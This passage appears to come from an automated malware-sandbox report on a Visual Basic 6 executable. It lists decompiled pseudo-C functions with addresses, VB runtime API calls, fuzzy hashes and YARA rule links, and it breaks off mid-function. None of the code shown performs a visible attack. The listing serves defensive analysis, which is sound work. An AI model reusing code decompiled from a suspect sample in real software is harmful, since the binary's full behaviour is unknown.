                                                  • Instruction ID: 533f089ec6a735cc59fb5396d378c0922cb84201b189b19c68f6beee06ab5af3
                                                  • Opcode Fuzzy Hash: cba4b94cf14e4ab5847180193a2e17e2259208cf537085ab1f9640a937fcf633
                                                  • Instruction Fuzzy Hash: 5D5109B1D40219DBDB21DF91C985BDEB7B8FF08304F1081AAE105B7291DB795A85CF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00413493, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 61%
                                                  			E00413493(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a16, void* _a32, void* _a64) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				void* _v52;
				void* _v68;
				char _v72;
				intOrPtr* _v76;
				signed int _v80;
				intOrPtr* _v88;
				signed int _v92;
				char* _t35;
				signed int _t38;
				intOrPtr _t58;

				_push(0x401216);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_push(0x48);
				L00401210();
				_v12 = _t58;
				_v8 = 0x4011f0;
				L004012DC();
				L004012DC();
				L004012DC();
				if( *0x414010 != 0) {
					_v88 = 0x414010;
				} else {
					_push("H9a");
					_push(0x405094);
					L004012EE();
					_v88 = 0x414010;
				}
				_t35 =  &_v72;
				L004012E8();
				_v76 = _t35;
				_t38 =  *((intOrPtr*)( *_v76 + 0x1bc))(_v76, _t35,  *((intOrPtr*)( *((intOrPtr*)( *_v88)) + 0x370))( *_v88));
				asm("fclex");
				_v80 = _t38;
				if(_v80 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x1bc);
					_push(0x404e0c);
					_push(_v76);
					_push(_v80);
					L00401324();
					_v92 = _t38;
				}
				L004012E2();
				_push(0x413591);
				L00401312();
				L00401312();
				L00401312();
				return _t38;
			}
















                                                  0x00413498
                                                  0x004134a3
                                                  0x004134a4
                                                  0x004134ab
                                                  0x004134ae
                                                  0x004134b6
                                                  0x004134b9
                                                  0x004134c6
                                                  0x004134d1
                                                  0x004134dc
                                                  0x004134e8
                                                  0x00413502
                                                  0x004134ea
                                                  0x004134ea
                                                  0x004134ef
                                                  0x004134f4
                                                  0x004134f9
                                                  0x004134f9
                                                  0x0041351d
                                                  0x00413521
                                                  0x00413526
                                                  0x00413531
                                                  0x00413537
                                                  0x00413539
                                                  0x00413540
                                                  0x0041355c
                                                  0x00413542
                                                  0x00413542
                                                  0x00413547
                                                  0x0041354c
                                                  0x0041354f
                                                  0x00413552
                                                  0x00413557
                                                  0x00413557
                                                  0x00413563
                                                  0x00413568
                                                  0x0041357b
                                                  0x00413583
                                                  0x0041358b
                                                  0x00413590

                                                  APIs
                                                  • __vbaChkstk.MSVBVM60(?,00401216), ref: 004134AE
                                                  • __vbaVarDup.MSVBVM60(?,?,?,?,00401216), ref: 004134C6
                                                  • __vbaVarDup.MSVBVM60(?,?,?,?,00401216), ref: 004134D1
                                                  • __vbaVarDup.MSVBVM60(?,?,?,?,00401216), ref: 004134DC
                                                  • __vbaNew2.MSVBVM60(00405094,H9a,?,?,?,?,00401216), ref: 004134F4
                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413521
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E0C,000001BC), ref: 00413552
                                                  • __vbaFreeObj.MSVBVM60 ref: 00413563
                                                  • __vbaFreeVar.MSVBVM60(00413591), ref: 0041357B
                                                  • __vbaFreeVar.MSVBVM60(00413591), ref: 00413583
                                                  • __vbaFreeVar.MSVBVM60(00413591), ref: 0041358B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247262762.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.247259243.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247273293.0000000000414000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247277295.0000000000416000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __vba$Free$CheckChkstkHresultNew2
                                                  • String ID: H9a
                                                  • API String ID: 1725699769-3053050142
                                                  • Opcode ID: 952b66dd6ccc598eedc321f573ea6fb93563607ab481dd39455276debfcad5c9
                                                  • Instruction ID: 38d9e45da34c02b5610314febf44cb564ad71e7fe64d15a8578e3ebe5bfee723
                                                  • Opcode Fuzzy Hash: 952b66dd6ccc598eedc321f573ea6fb93563607ab481dd39455276debfcad5c9
                                                  • Instruction Fuzzy Hash: 7A21D870900208AFCB14EFE1D885BDDBBB5BF48704F60446EE102BB1A1DB796A45DB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004131F9, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 103COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 53%
                                                  			E004131F9(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v48;
				char _v56;
				intOrPtr _v64;
				char _v72;
				intOrPtr _v80;
				intOrPtr* _v84;
				signed int _v88;
				intOrPtr* _v100;
				signed int _v104;
				char* _t45;
				signed int _t51;
				intOrPtr _t56;
				void* _t68;
				void* _t70;
				intOrPtr _t71;

				_t71 = _t70 - 0xc;
				 *[fs:0x0] = _t71;
				L00401210();
				_v16 = _t71;
				_v12 = 0x4011d0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x50,  *[fs:0x0], 0x401216, _t68);
				L004012B2();
				if( *0x414010 != 0) {
					_v100 = 0x414010;
				} else {
					_push("H9a");
					_push(0x405094);
					L004012EE();
					_v100 = 0x414010;
				}
				_t56 =  *((intOrPtr*)( *_v100));
				_t45 =  &_v32;
				L004012E8();
				_v84 = _t45;
				_v72 = 0x80020004;
				_v80 = 0xa;
				_v56 = 0x80020004;
				_v64 = 0xa;
				_v40 = 0x80020004;
				_v48 = 0xa;
				L00401210();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401210();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401210();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v56 =  *0x4011c8;
				_t51 =  *((intOrPtr*)( *_v84 + 0x1b4))(_v84, _t56, 0x10, 0x10, 0x10, _t45,  *((intOrPtr*)(_t56 + 0x320))( *_v100));
				asm("fclex");
				_v88 = _t51;
				if(_v88 >= 0) {
					_v104 = _v104 & 0x00000000;
				} else {
					_push(0x1b4);
					_push(0x404e0c);
					_push(_v84);
					_push(_v88);
					L00401324();
					_v104 = _t51;
				}
				L004012E2();
				asm("wait");
				_push(0x41334c);
				L004012FA();
				return _t51;
			}
























                                                  0x004131fc
                                                  0x0041320b
                                                  0x00413215
                                                  0x0041321d
                                                  0x00413220
                                                  0x00413227
                                                  0x00413236
                                                  0x0041323f
                                                  0x0041324b
                                                  0x00413265
                                                  0x0041324d
                                                  0x0041324d
                                                  0x00413252
                                                  0x00413257
                                                  0x0041325c
                                                  0x0041325c
                                                  0x00413276
                                                  0x00413280
                                                  0x00413284
                                                  0x00413289
                                                  0x0041328c
                                                  0x00413293
                                                  0x0041329a
                                                  0x004132a1
                                                  0x004132a8
                                                  0x004132af
                                                  0x004132b9
                                                  0x004132c3
                                                  0x004132c4
                                                  0x004132c5
                                                  0x004132c6
                                                  0x004132ca
                                                  0x004132d4
                                                  0x004132d5
                                                  0x004132d6
                                                  0x004132d7
                                                  0x004132db
                                                  0x004132e5
                                                  0x004132e6
                                                  0x004132e7
                                                  0x004132e8
                                                  0x004132f0
                                                  0x004132fb
                                                  0x00413301
                                                  0x00413303
                                                  0x0041330a
                                                  0x00413326
                                                  0x0041330c
                                                  0x0041330c
                                                  0x00413311
                                                  0x00413316
                                                  0x00413319
                                                  0x0041331c
                                                  0x00413321
                                                  0x00413321
                                                  0x0041332d
                                                  0x00413332
                                                  0x00413333
                                                  0x00413346
                                                  0x0041334b

                                                  APIs
                                                  • __vbaChkstk.MSVBVM60(?,00401216), ref: 00413215
                                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,00401216), ref: 0041323F
                                                  • __vbaNew2.MSVBVM60(00405094,H9a,?,?,?,?,00401216), ref: 00413257
                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413284
                                                  • __vbaChkstk.MSVBVM60(?,00000000), ref: 004132B9
                                                  • __vbaChkstk.MSVBVM60(?,00000000), ref: 004132CA
                                                  • __vbaChkstk.MSVBVM60(?,00000000), ref: 004132DB
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E0C,000001B4,?,?,00000000), ref: 0041331C
                                                  • __vbaFreeObj.MSVBVM60(?,?,00000000), ref: 0041332D
                                                  • __vbaFreeStr.MSVBVM60(0041334C,?,?,00000000), ref: 00413346
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247262762.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.247259243.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247273293.0000000000414000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247277295.0000000000416000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __vba$Chkstk$Free$CheckCopyHresultNew2
                                                  • String ID: H9a
                                                  • API String ID: 781568913-3053050142
                                                  • Opcode ID: 1bf52771ffe4864cd73980bde3622fd1f379697a366db5ff3027c55c432bd871
                                                  • Instruction ID: 33c3f588722b81d4775bf4371a25e774b2860cdd3578149490574802901307a5
                                                  • Opcode Fuzzy Hash: 1bf52771ffe4864cd73980bde3622fd1f379697a366db5ff3027c55c432bd871
                                                  • Instruction Fuzzy Hash: 6C4116B0940708EBCB00EFD5C849BDEBBB5BF09704F20846AF901BB2A1C7B95945CB48
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00412E34, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 63%
                                                  			E00412E34(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a24, void* _a52) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				void* _v56;
				char _v60;
				intOrPtr _v68;
				intOrPtr _v76;
				intOrPtr* _v80;
				signed int _v84;
				intOrPtr* _v96;
				signed int _v100;
				char* _t42;
				signed int _t46;
				void* _t62;
				void* _t64;
				intOrPtr _t65;

				_t65 = _t64 - 0xc;
				 *[fs:0x0] = _t65;
				L00401210();
				_v16 = _t65;
				_v12 = 0x4011a8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x4c,  *[fs:0x0], 0x401216, _t62);
				L004012DC();
				L004012DC();
				if( *0x414010 != 0) {
					_v96 = 0x414010;
				} else {
					_push("H9a");
					_push(0x405094);
					L004012EE();
					_v96 = 0x414010;
				}
				_t42 =  &_v60;
				L004012E8();
				_v80 = _t42;
				_v68 = 0x80020004;
				_v76 = 0xa;
				L00401210();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t46 =  *((intOrPtr*)( *_v80 + 0x1b0))(_v80, 0x10, _t42,  *((intOrPtr*)( *((intOrPtr*)( *_v96)) + 0x318))( *_v96));
				asm("fclex");
				_v84 = _t46;
				if(_v84 >= 0) {
					_v100 = _v100 & 0x00000000;
				} else {
					_push(0x1b0);
					_push(0x404e0c);
					_push(_v80);
					_push(_v84);
					L00401324();
					_v100 = _t46;
				}
				L004012E2();
				_push(0x412f51);
				L00401312();
				L00401312();
				return _t46;
			}




















                                                  0x00412e37
                                                  0x00412e46
                                                  0x00412e50
                                                  0x00412e58
                                                  0x00412e5b
                                                  0x00412e62
                                                  0x00412e71
                                                  0x00412e7a
                                                  0x00412e85
                                                  0x00412e91
                                                  0x00412eab
                                                  0x00412e93
                                                  0x00412e93
                                                  0x00412e98
                                                  0x00412e9d
                                                  0x00412ea2
                                                  0x00412ea2
                                                  0x00412ec6
                                                  0x00412eca
                                                  0x00412ecf
                                                  0x00412ed2
                                                  0x00412ed9
                                                  0x00412ee3
                                                  0x00412eed
                                                  0x00412eee
                                                  0x00412eef
                                                  0x00412ef0
                                                  0x00412ef9
                                                  0x00412eff
                                                  0x00412f01
                                                  0x00412f08
                                                  0x00412f24
                                                  0x00412f0a
                                                  0x00412f0a
                                                  0x00412f0f
                                                  0x00412f14
                                                  0x00412f17
                                                  0x00412f1a
                                                  0x00412f1f
                                                  0x00412f1f
                                                  0x00412f2b
                                                  0x00412f30
                                                  0x00412f43
                                                  0x00412f4b
                                                  0x00412f50

                                                  APIs
                                                  • __vbaChkstk.MSVBVM60(?,00401216), ref: 00412E50
                                                  • __vbaVarDup.MSVBVM60(?,?,?,?,00401216), ref: 00412E7A
                                                  • __vbaVarDup.MSVBVM60(?,?,?,?,00401216), ref: 00412E85
                                                  • __vbaNew2.MSVBVM60(00405094,H9a,?,?,?,?,00401216), ref: 00412E9D
                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00412ECA
                                                  • __vbaChkstk.MSVBVM60(?,00000000), ref: 00412EE3
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E0C,000001B0), ref: 00412F1A
                                                  • __vbaFreeObj.MSVBVM60 ref: 00412F2B
                                                  • __vbaFreeVar.MSVBVM60(00412F51), ref: 00412F43
                                                  • __vbaFreeVar.MSVBVM60(00412F51), ref: 00412F4B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247262762.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.247259243.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247273293.0000000000414000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247277295.0000000000416000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __vba$Free$Chkstk$CheckHresultNew2
                                                  • String ID: H9a
                                                  • API String ID: 2096563423-3053050142
                                                  • Opcode ID: 534dc5667734ddb23f827e8f501403ead6058b47dc5c000fe986d1c359cf7fbc
                                                  • Instruction ID: aa598794ed7581198f264f23524e7919a5ebf0c80c0af0212e2a36d756234875
                                                  • Opcode Fuzzy Hash: 534dc5667734ddb23f827e8f501403ead6058b47dc5c000fe986d1c359cf7fbc
                                                  • Instruction Fuzzy Hash: 0D310470900208AFCB10EFD1C846BCEBBB5BF49704F10446AF501BB2A1C7B95996DB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041336B, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 54%
                                                  			E0041336B(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a20, void* _a60) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				void* _v60;
				char _v64;
				signed int _v72;
				intOrPtr _v80;
				intOrPtr* _v84;
				signed int _v88;
				intOrPtr* _v96;
				signed int _v100;
				char* _t36;
				signed int _t40;
				intOrPtr _t59;

				_push(0x401216);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t59;
				_push(0x50);
				L00401210();
				_v12 = _t59;
				_v8 = 0x4011e0;
				L004012DC();
				L004012DC();
				if( *0x414010 != 0) {
					_v96 = 0x414010;
				} else {
					_push("H9a");
					_push(0x405094);
					L004012EE();
					_v96 = 0x414010;
				}
				_t36 =  &_v64;
				L004012E8();
				_v84 = _t36;
				_v72 = _v72 & 0x00000000;
				_v80 = 2;
				L00401210();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t40 =  *((intOrPtr*)( *_v84 + 0x1b8))(_v84, 0x10, _t36,  *((intOrPtr*)( *((intOrPtr*)( *_v96)) + 0x368))( *_v96));
				asm("fclex");
				_v88 = _t40;
				if(_v88 >= 0) {
					_v100 = _v100 & 0x00000000;
				} else {
					_push(0x1b8);
					_push(0x404e0c);
					_push(_v84);
					_push(_v88);
					L00401324();
					_v100 = _t40;
				}
				L004012E2();
				_push(0x413472);
				L00401312();
				L00401312();
				return _t40;
			}

















                                                  0x00413370
                                                  0x0041337b
                                                  0x0041337c
                                                  0x00413383
                                                  0x00413386
                                                  0x0041338e
                                                  0x00413391
                                                  0x0041339e
                                                  0x004133a9
                                                  0x004133b5
                                                  0x004133cf
                                                  0x004133b7
                                                  0x004133b7
                                                  0x004133bc
                                                  0x004133c1
                                                  0x004133c6
                                                  0x004133c6
                                                  0x004133ea
                                                  0x004133ee
                                                  0x004133f3
                                                  0x004133f6
                                                  0x004133fa
                                                  0x00413404
                                                  0x0041340e
                                                  0x0041340f
                                                  0x00413410
                                                  0x00413411
                                                  0x0041341a
                                                  0x00413420
                                                  0x00413422
                                                  0x00413429
                                                  0x00413445
                                                  0x0041342b
                                                  0x0041342b
                                                  0x00413430
                                                  0x00413435
                                                  0x00413438
                                                  0x0041343b
                                                  0x00413440
                                                  0x00413440
                                                  0x0041344c
                                                  0x00413451
                                                  0x00413464
                                                  0x0041346c
                                                  0x00413471

                                                  APIs
                                                  • __vbaChkstk.MSVBVM60(?,00401216), ref: 00413386
                                                  • __vbaVarDup.MSVBVM60(?,?,?,?,00401216), ref: 0041339E
                                                  • __vbaVarDup.MSVBVM60(?,?,?,?,00401216), ref: 004133A9
                                                  • __vbaNew2.MSVBVM60(00405094,H9a,?,?,?,?,00401216), ref: 004133C1
                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 004133EE
                                                  • __vbaChkstk.MSVBVM60(?,00000000), ref: 00413404
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E0C,000001B8), ref: 0041343B
                                                  • __vbaFreeObj.MSVBVM60 ref: 0041344C
                                                  • __vbaFreeVar.MSVBVM60(00413472), ref: 00413464
                                                  • __vbaFreeVar.MSVBVM60(00413472), ref: 0041346C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247262762.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.247259243.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247273293.0000000000414000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247277295.0000000000416000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __vba$Free$Chkstk$CheckHresultNew2
                                                  • String ID: H9a
                                                  • API String ID: 2096563423-3053050142
                                                  • Opcode ID: eb03baa760e1e97a290d5fd20bd90095b9ac79dbceb7e65ae653c98dcde8bb00
                                                  • Instruction ID: e74889861e44ea8aaa653ac594dc2d473b6b1ac2eeae1865a6036716770d1465
                                                  • Opcode Fuzzy Hash: eb03baa760e1e97a290d5fd20bd90095b9ac79dbceb7e65ae653c98dcde8bb00
                                                  • Instruction Fuzzy Hash: 9C311670900208AFCB10EFD1C846BDEBBB4BF48B09F10446EF511BB1A5DBB96945DB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00412CFD, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E00412CFD(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a36) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				void* _v40;
				signed int _v44;
				void* _v48;
				intOrPtr* _v52;
				signed int _v56;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr _v72;
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _t49;
				signed int _t54;
				signed int _t55;
				intOrPtr _t69;

				_push(0x401216);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t69;
				_push(0x40);
				L00401210();
				_v12 = _t69;
				_v8 = 0x401198;
				L004012DC();
				if( *0x41446c != 0) {
					_v76 = 0x41446c;
				} else {
					_push(0x41446c);
					_push(0x404e74);
					L004012EE();
					_v76 = 0x41446c;
				}
				_t7 =  &_v76; // 0x41446c
				_v52 =  *((intOrPtr*)( *_t7));
				_t49 =  *((intOrPtr*)( *_v52 + 0x14))(_v52,  &_v48);
				asm("fclex");
				_v56 = _t49;
				if(_v56 >= 0) {
					_v80 = _v80 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x404e64);
					_push(_v52);
					_push(_v56);
					L00401324();
					_v80 = _t49;
				}
				_v60 = _v48;
				_t54 =  *((intOrPtr*)( *_v60 + 0xd0))(_v60,  &_v44);
				asm("fclex");
				_v64 = _t54;
				if(_v64 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0xd0);
					_push(0x404e84);
					_push(_v60);
					_push(_v64);
					L00401324();
					_v84 = _t54;
				}
				_t55 = _v44;
				_v72 = _t55;
				_v44 = _v44 & 0x00000000;
				L00401306();
				L004012E2();
				_push(0x412e21);
				L00401312();
				L004012FA();
				return _t55;
			}





















                                                  0x00412d02
                                                  0x00412d0d
                                                  0x00412d0e
                                                  0x00412d15
                                                  0x00412d18
                                                  0x00412d20
                                                  0x00412d23
                                                  0x00412d30
                                                  0x00412d3c
                                                  0x00412d56
                                                  0x00412d3e
                                                  0x00412d3e
                                                  0x00412d43
                                                  0x00412d48
                                                  0x00412d4d
                                                  0x00412d4d
                                                  0x00412d5d
                                                  0x00412d62
                                                  0x00412d71
                                                  0x00412d74
                                                  0x00412d76
                                                  0x00412d7d
                                                  0x00412d96
                                                  0x00412d7f
                                                  0x00412d7f
                                                  0x00412d81
                                                  0x00412d86
                                                  0x00412d89
                                                  0x00412d8c
                                                  0x00412d91
                                                  0x00412d91
                                                  0x00412d9d
                                                  0x00412dac
                                                  0x00412db2
                                                  0x00412db4
                                                  0x00412dbb
                                                  0x00412dd7
                                                  0x00412dbd
                                                  0x00412dbd
                                                  0x00412dc2
                                                  0x00412dc7
                                                  0x00412dca
                                                  0x00412dcd
                                                  0x00412dd2
                                                  0x00412dd2
                                                  0x00412ddb
                                                  0x00412dde
                                                  0x00412de1
                                                  0x00412deb
                                                  0x00412df3
                                                  0x00412df8
                                                  0x00412e13
                                                  0x00412e1b
                                                  0x00412e20

                                                  APIs
                                                  • __vbaChkstk.MSVBVM60(?,00401216), ref: 00412D18
                                                  • __vbaVarDup.MSVBVM60(?,?,?,?,00401216), ref: 00412D30
                                                  • __vbaNew2.MSVBVM60(00404E74,0041446C,?,?,?,?,00401216), ref: 00412D48
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E64,00000014), ref: 00412D8C
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E84,000000D0), ref: 00412DCD
                                                  • __vbaStrMove.MSVBVM60 ref: 00412DEB
                                                  • __vbaFreeObj.MSVBVM60 ref: 00412DF3
                                                  • __vbaFreeVar.MSVBVM60(00412E21), ref: 00412E13
                                                  • __vbaFreeStr.MSVBVM60(00412E21), ref: 00412E1B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247262762.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.247259243.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247273293.0000000000414000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247277295.0000000000416000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __vba$Free$CheckHresult$ChkstkMoveNew2
                                                  • String ID: lDA
                                                  • API String ID: 1876247458-725749841
                                                  • Opcode ID: 92f19653aa21d462fd6041eab8d658da6d4e56e2e9fa27ddd275a7c690dd0b59
                                                  • Instruction ID: ec8cf6c86359c2468532c0d178ede4eab00d7a4baecb58cbace404f0110e4f9f
                                                  • Opcode Fuzzy Hash: 92f19653aa21d462fd6041eab8d658da6d4e56e2e9fa27ddd275a7c690dd0b59
                                                  • Instruction Fuzzy Hash: A331CF71D00208AFDB10EFD5E985BDDBBB4BF48718F20406AF501B62A0D7B85995DF68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041263A, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 59%
                                                  			E0041263A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				char _v48;
				signed int _v56;
				intOrPtr _v64;
				intOrPtr* _v68;
				signed int _v72;
				intOrPtr* _v84;
				signed int _v88;
				char* _t40;
				signed int _t44;
				void* _t57;
				void* _t59;
				intOrPtr _t60;

				_t60 = _t59 - 0xc;
				 *[fs:0x0] = _t60;
				L00401210();
				_v16 = _t60;
				_v12 = 0x401138;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x40,  *[fs:0x0], 0x401216, _t57);
				L004012DC();
				if( *0x414010 != 0) {
					_v84 = 0x414010;
				} else {
					_push("H9a");
					_push(0x405094);
					L004012EE();
					_v84 = 0x414010;
				}
				_t40 =  &_v48;
				L004012E8();
				_v68 = _t40;
				_v56 = _v56 & 0x00000000;
				_v64 = 2;
				L00401210();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t44 =  *((intOrPtr*)( *_v68 + 0x1b8))(_v68, 0x10, _t40,  *((intOrPtr*)( *((intOrPtr*)( *_v84)) + 0x344))( *_v84));
				asm("fclex");
				_v72 = _t44;
				if(_v72 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x1b8);
					_push(0x404e0c);
					_push(_v68);
					_push(_v72);
					L00401324();
					_v88 = _t44;
				}
				L004012E2();
				asm("wait");
				_push(0x412742);
				L00401312();
				return _t44;
			}



















                                                  0x0041263d
                                                  0x0041264c
                                                  0x00412656
                                                  0x0041265e
                                                  0x00412661
                                                  0x00412668
                                                  0x00412677
                                                  0x00412680
                                                  0x0041268c
                                                  0x004126a6
                                                  0x0041268e
                                                  0x0041268e
                                                  0x00412693
                                                  0x00412698
                                                  0x0041269d
                                                  0x0041269d
                                                  0x004126c1
                                                  0x004126c5
                                                  0x004126ca
                                                  0x004126cd
                                                  0x004126d1
                                                  0x004126db
                                                  0x004126e5
                                                  0x004126e6
                                                  0x004126e7
                                                  0x004126e8
                                                  0x004126f1
                                                  0x004126f7
                                                  0x004126f9
                                                  0x00412700
                                                  0x0041271c
                                                  0x00412702
                                                  0x00412702
                                                  0x00412707
                                                  0x0041270c
                                                  0x0041270f
                                                  0x00412712
                                                  0x00412717
                                                  0x00412717
                                                  0x00412723
                                                  0x00412728
                                                  0x00412729
                                                  0x0041273c
                                                  0x00412741

                                                  APIs
                                                  • __vbaChkstk.MSVBVM60(?,00401216), ref: 00412656
                                                  • __vbaVarDup.MSVBVM60(?,?,?,?,00401216), ref: 00412680
                                                  • __vbaNew2.MSVBVM60(00405094,H9a,?,?,?,?,00401216), ref: 00412698
                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 004126C5
                                                  • __vbaChkstk.MSVBVM60(?,00000000), ref: 004126DB
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E0C,000001B8), ref: 00412712
                                                  • __vbaFreeObj.MSVBVM60 ref: 00412723
                                                  • __vbaFreeVar.MSVBVM60(00412742), ref: 0041273C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247262762.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.247259243.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247273293.0000000000414000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247277295.0000000000416000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __vba$ChkstkFree$CheckHresultNew2
                                                  • String ID: H9a
                                                  • API String ID: 2807847221-3053050142
                                                  • Opcode ID: 179cf9c08fe7104d0c85d69368658b88ca8ef273d2954433a37736ba6ac67708
                                                  • Instruction ID: eaaa6ddea8c8f4f5b903b5cc1d5c76ba8e52542727eab9fce4bb7e26f14f436b
                                                  • Opcode Fuzzy Hash: 179cf9c08fe7104d0c85d69368658b88ca8ef273d2954433a37736ba6ac67708
                                                  • Instruction Fuzzy Hash: 69312A70940208EFCB10EFD1C946BDEBBB5BF48704F20846AF501BB2A1C7B95955CB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041285D, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 64%
                                                  			E0041285D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				signed int _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				intOrPtr* _v52;
				signed int _v56;
				intOrPtr _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _t53;
				signed int _t58;
				signed int _t59;
				void* _t67;
				void* _t69;
				intOrPtr _t70;

				_t70 = _t69 - 0xc;
				 *[fs:0x0] = _t70;
				L00401210();
				_v16 = _t70;
				_v12 = 0x401158;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x38,  *[fs:0x0], 0x401216, _t67);
				if( *0x41446c != 0) {
					_v72 = 0x41446c;
				} else {
					_push(0x41446c);
					_push(0x404e74);
					L004012EE();
					_v72 = 0x41446c;
				}
